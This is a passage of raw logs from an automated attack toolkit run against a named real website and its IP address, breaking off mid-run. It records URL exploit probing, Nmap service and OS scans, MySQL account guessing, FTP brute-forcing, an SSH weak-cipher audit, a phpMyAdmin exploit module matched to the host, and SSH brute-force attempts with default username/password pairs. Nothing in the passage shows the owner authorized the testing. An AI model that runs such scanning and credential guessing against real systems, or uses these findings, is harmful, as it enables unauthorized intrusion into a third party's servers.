4208|_[ + ] Found:: UNIDENTIFIED
4209
4210 _[ - ]::--------------------------------------------------------------------------------------------------------------
4211|_[ + ] [ 91 / 100 ]-[21:34:40] [ - ]
4212|_[ + ] Target:: [ http://hello-chat.com/rank100.html?436 ]
4213|_[ + ] Exploit::
4214|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
4215|_[ + ] More details:: / - / , ISP:
4216|_[ + ] Found:: UNIDENTIFIED
4217
4218 _[ - ]::--------------------------------------------------------------------------------------------------------------
4219|_[ + ] [ 92 / 100 ]-[21:34:45] [ - ]
4220|_[ + ] Target:: [ http://hello-chat.com/rank100.html?132 ]
4221|_[ + ] Exploit::
4222|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
4223|_[ + ] More details:: / - / , ISP:
4224|_[ + ] Found:: UNIDENTIFIED
4225
4226 _[ - ]::--------------------------------------------------------------------------------------------------------------
4227|_[ + ] [ 93 / 100 ]-[21:34:49] [ - ]
4228|_[ + ] Target:: [ http://hello-chat.com/rank100.html?365 ]
4229|_[ + ] Exploit::
4230|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
4231|_[ + ] More details:: / - / , ISP:
4232|_[ + ] Found:: UNIDENTIFIED
4233
4234 _[ - ]::--------------------------------------------------------------------------------------------------------------
4235|_[ + ] [ 94 / 100 ]-[21:34:54] [ - ]
4236|_[ + ] Target:: [ http://hello-chat.com/rank100.html?144 ]
4237|_[ + ] Exploit::
4238|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
4239|_[ + ] More details:: / - / , ISP:
4240|_[ + ] Found:: UNIDENTIFIED
4241
4242 _[ - ]::--------------------------------------------------------------------------------------------------------------
4243|_[ + ] [ 95 / 100 ]-[21:34:58] [ - ]
4244|_[ + ] Target:: [ http://hello-chat.com/rank100.html?247 ]
4245|_[ + ] Exploit::
4246|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
4247|_[ + ] More details:: / - / , ISP:
4248|_[ + ] Found:: UNIDENTIFIED
4249
4250 _[ - ]::--------------------------------------------------------------------------------------------------------------
4251|_[ + ] [ 96 / 100 ]-[21:35:02] [ - ]
4252|_[ + ] Target:: [ http://hello-chat.com/rank100.html?348 ]
4253|_[ + ] Exploit::
4254|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
4255|_[ + ] More details:: / - / , ISP:
4256|_[ + ] Found:: UNIDENTIFIED
4257
4258 _[ - ]::--------------------------------------------------------------------------------------------------------------
4259|_[ + ] [ 97 / 100 ]-[21:35:07] [ - ]
4260|_[ + ] Target:: [ http://hello-chat.com/rank100.html?313 ]
4261|_[ + ] Exploit::
4262|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
4263|_[ + ] More details:: / - / , ISP:
4264|_[ + ] Found:: UNIDENTIFIED
4265
4266 _[ - ]::--------------------------------------------------------------------------------------------------------------
4267|_[ + ] [ 98 / 100 ]-[21:35:11] [ - ]
4268|_[ + ] Target:: [ http://hello-chat.com/rank100.html?362 ]
4269|_[ + ] Exploit::
4270|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
4271|_[ + ] More details:: / - / , ISP:
4272|_[ + ] Found:: UNIDENTIFIED
4273
4274 _[ - ]::--------------------------------------------------------------------------------------------------------------
4275|_[ + ] [ 99 / 100 ]-[21:35:16] [ - ]
4276|_[ + ] Target:: [ http://hello-chat.com/rank100.html?366 ]
4277|_[ + ] Exploit::
4278|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
4279|_[ + ] More details:: / - / , ISP:
4280|_[ + ] Found:: UNIDENTIFIED
4281
4282[ INFO ] [ Shutting down ]
4283[ INFO ] [ End of process INURLBR at [18-03-2020 21:35:16]
4284[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
4285[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/hello-chat.com/output/inurlbr-hello-chat.com ]
4286|_________________________________________________________________________________________
4287
4288\_________________________________________________________________________________________/
4289#################################################################################################################################
4290Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:35 EDT
4291NSE: Loaded 57 scripts for scanning.
4292NSE: Script Pre-scanning.
4293Initiating NSE at 21:35
4294Completed NSE at 21:35, 0.00s elapsed
4295Initiating NSE at 21:35
4296Completed NSE at 21:35, 0.00s elapsed
4297Initiating Parallel DNS resolution of 1 host. at 21:35
4298Completed Parallel DNS resolution of 1 host. at 21:35, 0.02s elapsed
4299Initiating SYN Stealth Scan at 21:35
4300Scanning hello-chat.com (199.38.245.243) [1 port]
4301Discovered open port 3306/tcp on 199.38.245.243
4302Completed SYN Stealth Scan at 21:35, 0.29s elapsed (1 total ports)
4303Initiating Service scan at 21:35
4304Scanning 1 service on hello-chat.com (199.38.245.243)
4305Completed Service scan at 21:35, 0.51s elapsed (1 service on 1 host)
4306Initiating OS detection (try #1) against hello-chat.com (199.38.245.243)
4307Retrying OS detection (try #2) against hello-chat.com (199.38.245.243)
4308Initiating Traceroute at 21:35
4309Completed Traceroute at 21:35, 3.17s elapsed
4310Initiating Parallel DNS resolution of 10 hosts. at 21:35
4311Completed Parallel DNS resolution of 10 hosts. at 21:35, 1.31s elapsed
4312NSE: Script scanning 199.38.245.243.
4313Initiating NSE at 21:35
4314Completed NSE at 21:37, 90.56s elapsed
4315Initiating NSE at 21:37
4316Completed NSE at 21:37, 0.05s elapsed
4317Nmap scan report for hello-chat.com (199.38.245.243)
4318Host is up (0.24s latency).
4319
4320PORT STATE SERVICE VERSION
43213306/tcp open mysql MySQL (unauthorized)
4322|_mysql-empty-password: Host '45.132.192.91' is not allowed to connect to this MySQL server
4323| mysql-enum:
4324| Accounts: No valid accounts found
4325|_ Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0
4326|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
4327Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4328Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Crestron XPanel control system (90%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Linux 2.6.39 - 3.2 (89%), Linux 3.1 - 3.2 (89%), Linux 3.2 - 4.9 (89%)
4329No exact OS matches for host (test conditions non-ideal).
4330Uptime guess: 38.059 days (since Sun Feb 9 19:12:10 2020)
4331Network Distance: 15 hops
4332TCP Sequence Prediction: Difficulty=264 (Good luck!)
4333IP ID Sequence Generation: All zeros
4334
4335TRACEROUTE (using port 3306/tcp)
4336HOP RTT ADDRESS
43371 134.37 ms 10.203.41.1
43382 ...
43393 135.58 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
43404 135.01 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
43415 140.56 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
43426 158.88 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
43437 167.71 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
43448 249.10 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
43459 245.59 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130)
434610 244.21 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
434711 ... 14
434815 247.29 ms 199.38.245.243
4349
4350NSE: Script Post-scanning.
4351Initiating NSE at 21:37
4352Completed NSE at 21:37, 0.03s elapsed
4353Initiating NSE at 21:37
4354Completed NSE at 21:37, 0.00s elapsed
4355################################################################################################################################
4356--------------------------------------------------------
4357<<<Yasuo discovered following vulnerable applications>>>
4358--------------------------------------------------------
4359+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
4360| App Name | URL to Application | Potential Exploit | Username | Password |
4361+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
4362| phpMyAdmin | https://199.38.245.243:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
4363+------------+----------------------------------------+--------------------------------------------------+-----------+-----------################################################################################################################################
4364Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 20:39 EDT
4365Nmap scan report for 199.38.245.243
4366Host is up (0.25s latency).
4367Not shown: 462 closed ports
4368PORT STATE SERVICE VERSION
436921/tcp open ftp Pure-FTPd
4370| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
4371| Not valid before: 2019-06-04T16:48:56
4372|_Not valid after: 2046-10-19T16:48:56
4373|_ssl-date: 2020-03-19T00:46:48+00:00; +6m01s from scanner time.
437422/tcp open ssh OpenSSH 5.3 (protocol 2.0)
4375| ssh-hostkey:
4376| 1024 1a:0d:eb:77:2b:24:04:b9:fb:ff:06:3a:d3:de:0b:fc (DSA)
4377|_ 2048 59:7a:97:24:cd:1c:5a:3a:87:31:41:1d:60:aa:27:dc (RSA)
437825/tcp open smtp Exim smtpd 4.92
4379| smtp-commands: server.18they.com Hello nmap.scanme.org [45.132.192.91], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
4380|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
4381| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4382| Not valid before: 2016-05-13T00:34:32
4383|_Not valid after: 2043-09-28T00:34:32
4384|_ssl-date: 2020-03-19T00:46:49+00:00; +6m02s from scanner time.
438553/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
4386| dns-nsid:
4387|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
438880/tcp open ssl/http Apache/2
4389|_http-server-header: Apache/2
4390|_http-title: Site doesn't have a title (text/html).
4391110/tcp open pop3 Dovecot DirectAdmin pop3d
4392|_pop3-capabilities: STLS UIDL SASL(PLAIN) AUTH-RESP-CODE PIPELINING TOP RESP-CODES USER CAPA
4393| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4394| Not valid before: 2016-05-13T00:34:32
4395|_Not valid after: 2043-09-28T00:34:32
4396|_ssl-date: 2020-03-19T00:46:49+00:00; +6m02s from scanner time.
4397143/tcp open imap Dovecot imapd
4398|_imap-capabilities: capabilities STARTTLS post-login AUTH=PLAINA0001 LOGIN-REFERRALS more have OK IDLE SASL-IR ID ENABLE LITERAL+ Pre-login listed IMAP4rev1
4399| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4400| Not valid before: 2016-05-13T00:34:32
4401|_Not valid after: 2043-09-28T00:34:32
4402|_ssl-date: 2020-03-19T00:46:48+00:00; +6m02s from scanner time.
4403443/tcp open ssl/ssl Apache httpd (SSL-only mode)
4404|_http-server-header: Apache/2
4405|_http-title: Site doesn't have a title (text/html).
4406| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
4407| Not valid before: 2019-06-04T16:48:56
4408|_Not valid after: 2046-10-19T16:48:56
4409|_ssl-date: 2020-03-19T00:46:47+00:00; +6m01s from scanner time.
4410465/tcp open ssl/smtp Exim smtpd 4.92
4411| smtp-commands: server.18they.com Hello nmap.scanme.org [45.132.192.91], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, HELP,
4412|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
4413| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4414| Not valid before: 2016-05-13T00:34:32
4415|_Not valid after: 2043-09-28T00:34:32
4416|_ssl-date: 2020-03-19T00:46:47+00:00; +6m01s from scanner time.
4417587/tcp open smtp Exim smtpd 4.92
4418| smtp-commands: server.18they.com Hello nmap.scanme.org [45.132.192.91], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
4419|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
4420| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4421| Not valid before: 2016-05-13T00:34:32
4422|_Not valid after: 2043-09-28T00:34:32
4423|_ssl-date: 2020-03-19T00:46:49+00:00; +6m02s from scanner time.
4424993/tcp open ssl/imap
4425| fingerprint-strings:
4426| GenericLines:
4427| * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot DA ready.
4428| Error in IMAP command received by server.
4429| Error in IMAP command received by server.
4430| NULL:
4431|_ * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot DA ready.
4432|_imap-capabilities: CAPABILITY
4433| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4434| Not valid before: 2016-05-13T00:34:32
4435|_Not valid after: 2043-09-28T00:34:32
4436|_ssl-date: 2020-03-19T00:46:48+00:00; +6m02s from scanner time.
4437995/tcp open ssl/pop3 Dovecot DirectAdmin pop3d
4438|_pop3-capabilities: AUTH-RESP-CODE SASL(PLAIN) USER UIDL CAPA RESP-CODES PIPELINING TOP
4439| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4440| Not valid before: 2016-05-13T00:34:32
4441|_Not valid after: 2043-09-28T00:34:32
4442|_ssl-date: 2020-03-19T00:46:47+00:00; +6m01s from scanner time.
44432222/tcp open http DirectAdmin httpd 1.57.1 (Registered to Your Domain Goes Here, LLP)
4444|_http-title: DirectAdmin Login
4445|_http-trane-info: Problem with XML parsing of /evox/about
44463306/tcp open mysql MySQL (unauthorized)
44471 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
4448SF-Port993-TCP:V=7.80%T=SSL%I=7%D=3/18%Time=5E72BF51%P=x86_64-pc-linux-gnu
4449SF:%r(NULL,6A,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20SASL-IR\x20LOGIN-R
4450SF:EFERRALS\x20ID\x20ENABLE\x20IDLE\x20LITERAL\+\x20AUTH=PLAIN\]\x20Doveco
4451SF:t\x20DA\x20ready\.\r\n")%r(GenericLines,CC,"\*\x20OK\x20\[CAPABILITY\x2
4452SF:0IMAP4rev1\x20SASL-IR\x20LOGIN-REFERRALS\x20ID\x20ENABLE\x20IDLE\x20LIT
4453SF:ERAL\+\x20AUTH=PLAIN\]\x20Dovecot\x20DA\x20ready\.\r\n\*\x20BAD\x20Erro
4454SF:r\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\r\n\*\x20BAD\x
4455SF:20Error\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\r\n");
4456Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%), Infomir MAG-250 set-top box (89%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (89%), Linux 3.7 (89%)
4457No exact OS matches for host (test conditions non-ideal).
4458Network Distance: 15 hops
4459Service Info: Host: server.18they.com; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
4460
4461Host script results:
4462|_clock-skew: mean: 6m01s, deviation: 0s, median: 6m01s
4463
4464TRACEROUTE (using port 3306/tcp)
4465HOP RTT ADDRESS
44661 130.69 ms 10.203.41.1
44672 ...
44683 131.20 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
44694 131.04 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
44705 136.46 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
44716 154.68 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
44727 163.79 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
44738 236.73 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
44749 238.91 ms be2099.ccr31.bos01.atlas.cogentco.com (154.54.82.34)
447510 237.55 ms be2273.rcr21.ewr03.atlas.cogentco.com (154.54.83.206)
447611 ... 14
447715 247.74 ms 199.38.245.243
4478#################################################################################################################################
4479Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 20:41 EDT
4480Nmap scan report for 199.38.245.243
4481Host is up (0.24s latency).
4482Not shown: 13 closed ports
4483PORT STATE SERVICE VERSION
448453/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
448553/udp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
4486| dns-nsid:
4487|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
448867/udp open|filtered dhcps
448968/udp open|filtered dhcpc
449069/udp open|filtered tftp
449188/udp open|filtered kerberos-sec
4492123/udp open|filtered ntp
4493137/udp open|filtered netbios-ns
4494138/udp open|filtered netbios-dgm
4495139/udp open|filtered netbios-ssn
4496161/udp open|filtered snmp
4497162/udp open|filtered snmptrap
4498389/udp open|filtered ldap
4499520/udp open|filtered route
45002049/udp open|filtered nfs
4501Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 3.7 (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%)
4502No exact OS matches for host (test conditions non-ideal).
4503Network Distance: 15 hops
4504Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
4505
4506TRACEROUTE (using port 53/tcp)
4507HOP RTT ADDRESS
45081 135.70 ms 10.203.41.1
45092 ...
45103 136.03 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
45114 136.06 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
45125 141.74 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
45136 153.04 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
45147 165.27 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
45158 243.30 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
45169 244.15 ms be2099.ccr31.bos01.atlas.cogentco.com (154.54.82.34)
451710 241.19 ms be3471.ccr41.jfk02.atlas.cogentco.com (154.54.40.154)
451811 ... 14
451915 239.02 ms 199.38.245.243
4520#################################################################################################################################
4521Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 20:46 EDT
4522NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
4523NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
4524NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
4525Nmap scan report for 199.38.245.243
4526Host is up (0.24s latency).
4527
4528PORT STATE SERVICE VERSION
452921/tcp open ftp Pure-FTPd
4530| ftp-brute:
4531| Accounts: No valid accounts found
4532|_ Statistics: Performed 1684 guesses in 189 seconds, average tps: 8.7
4533Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4534Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Linux 3.8 (90%), Crestron XPanel control system (90%), Linux 2.6.32 (89%), Linux 2.6.39 - 3.2 (89%), Linux 3.1 - 3.2 (89%), Linux 3.2 - 4.9 (89%)
4535No exact OS matches for host (test conditions non-ideal).
4536Network Distance: 15 hops
4537
4538TRACEROUTE (using port 21/tcp)
4539HOP RTT ADDRESS
45401 139.29 ms 10.203.41.1
45412 ...
45423 139.72 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
45434 139.69 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
45445 145.58 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
45456 167.48 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
45467 172.38 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
45478 243.60 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
45489 252.05 ms be12489.ccr42.par01.atlas.cogentco.com (154.54.57.70)
454910 249.75 ms be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122)
455011 ... 14
455115 240.12 ms 199.38.245.243
4552#################################################################################################################################
4553# general
4554(gen) banner: SSH-2.0-OpenSSH_5.3
4555(gen) software: OpenSSH 5.3
4556(gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
4557(gen) compression: enabled (zlib@openssh.com)
4558
4559# key exchange algorithms
4560(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
4561 `- [info] available since OpenSSH 4.4
4562(kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4563 `- [warn] using weak hashing algorithm
4564 `- [info] available since OpenSSH 2.3.0
4565(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
4566 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
4567(kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4568 `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
4569 `- [warn] using small 1024-bit modulus
4570 `- [warn] using weak hashing algorithm
4571 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
4572
4573# host-key algorithms
4574(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
4575(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
4576 `- [warn] using small 1024-bit modulus
4577 `- [warn] using weak random number generator could reveal the key
4578 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
4579
4580# encryption algorithms (ciphers)
4581(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
4582(enc) aes192-ctr -- [info] available since OpenSSH 3.7
4583(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
4584(enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4585 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
4586 `- [warn] using weak cipher
4587 `- [info] available since OpenSSH 4.2
4588(enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4589 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
4590 `- [warn] using weak cipher
4591 `- [info] available since OpenSSH 4.2
4592(enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4593 `- [warn] using weak cipher mode
4594 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
4595(enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4596 `- [warn] using weak cipher
4597 `- [warn] using weak cipher mode
4598 `- [warn] using small 64-bit block size
4599 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
4600(enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4601 `- [fail] disabled since Dropbear SSH 0.53
4602 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
4603 `- [warn] using weak cipher mode
4604 `- [warn] using small 64-bit block size
4605 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
4606(enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4607 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
4608 `- [warn] using weak cipher mode
4609 `- [warn] using small 64-bit block size
4610 `- [info] available since OpenSSH 2.1.0
4611(enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4612 `- [warn] using weak cipher mode
4613 `- [info] available since OpenSSH 2.3.0
4614(enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4615 `- [warn] using weak cipher mode
4616 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
4617(enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4618 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
4619 `- [warn] using weak cipher
4620 `- [info] available since OpenSSH 2.1.0
4621(enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4622 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
4623 `- [warn] using weak cipher mode
4624 `- [info] available since OpenSSH 2.3.0
4625
4626# message authentication code algorithms
4627(mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4628 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
4629 `- [warn] using encrypt-and-MAC mode
4630 `- [warn] using weak hashing algorithm
4631 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
4632(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
4633 `- [warn] using weak hashing algorithm
4634 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
4635(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
4636 `- [warn] using small 64-bit tag size
4637 `- [info] available since OpenSSH 4.7
4638(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
4639 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
4640(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
4641 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
4642(mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4643 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
4644 `- [warn] using encrypt-and-MAC mode
4645 `- [info] available since OpenSSH 2.5.0
4646(mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4647 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
4648 `- [warn] using encrypt-and-MAC mode
4649 `- [info] available since OpenSSH 2.1.0
4650(mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4651 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
4652 `- [warn] using encrypt-and-MAC mode
4653 `- [warn] using weak hashing algorithm
4654 `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
4655(mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
4656 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
4657 `- [warn] using encrypt-and-MAC mode
4658 `- [warn] using weak hashing algorithm
4659 `- [info] available since OpenSSH 2.5.0
4660
4661# algorithm recommendations (for OpenSSH 5.3)
4662(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
4663(rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
4664(rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
4665(rec) -ssh-dss -- key algorithm to remove
4666(rec) -arcfour -- enc algorithm to remove
4667(rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
4668(rec) -blowfish-cbc -- enc algorithm to remove
4669(rec) -3des-cbc -- enc algorithm to remove
4670(rec) -aes256-cbc -- enc algorithm to remove
4671(rec) -arcfour256 -- enc algorithm to remove
4672(rec) -cast128-cbc -- enc algorithm to remove
4673(rec) -aes192-cbc -- enc algorithm to remove
4674(rec) -arcfour128 -- enc algorithm to remove
4675(rec) -aes128-cbc -- enc algorithm to remove
4676(rec) -hmac-md5-96 -- mac algorithm to remove
4677(rec) -hmac-ripemd160 -- mac algorithm to remove
4678(rec) -hmac-sha1-96 -- mac algorithm to remove
4679(rec) -umac-64@openssh.com -- mac algorithm to remove
4680(rec) -hmac-md5 -- mac algorithm to remove
4681(rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
4682(rec) -hmac-sha1 -- mac algorithm to remove
4683#################################################################################################################################
4684Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 20:50 EDT
4685NSE: [ssh-run] Failed to specify credentials and command to run.
4686NSE: [ssh-brute] Trying username/password pair: root:root
4687NSE: [ssh-brute] Trying username/password pair: admin:admin
4688NSE: [ssh-brute] Trying username/password pair: administrator:administrator
4689NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
4690NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
4691NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
4692NSE: [ssh-brute] Trying username/password pair: guest:guest
4693NSE: [ssh-brute] Trying username/password pair: user:user
4694NSE: [ssh-brute] Trying username/password pair: web:web
4695NSE: [ssh-brute] Trying username/password pair: test:test
4696NSE: [ssh-brute] Trying username/password pair: root:
4697NSE: [ssh-brute] Trying username/password pair: admin:
4698NSE: [ssh-brute] Trying username/password pair: administrator:
4699NSE: [ssh-brute] Trying username/password pair: webadmin:
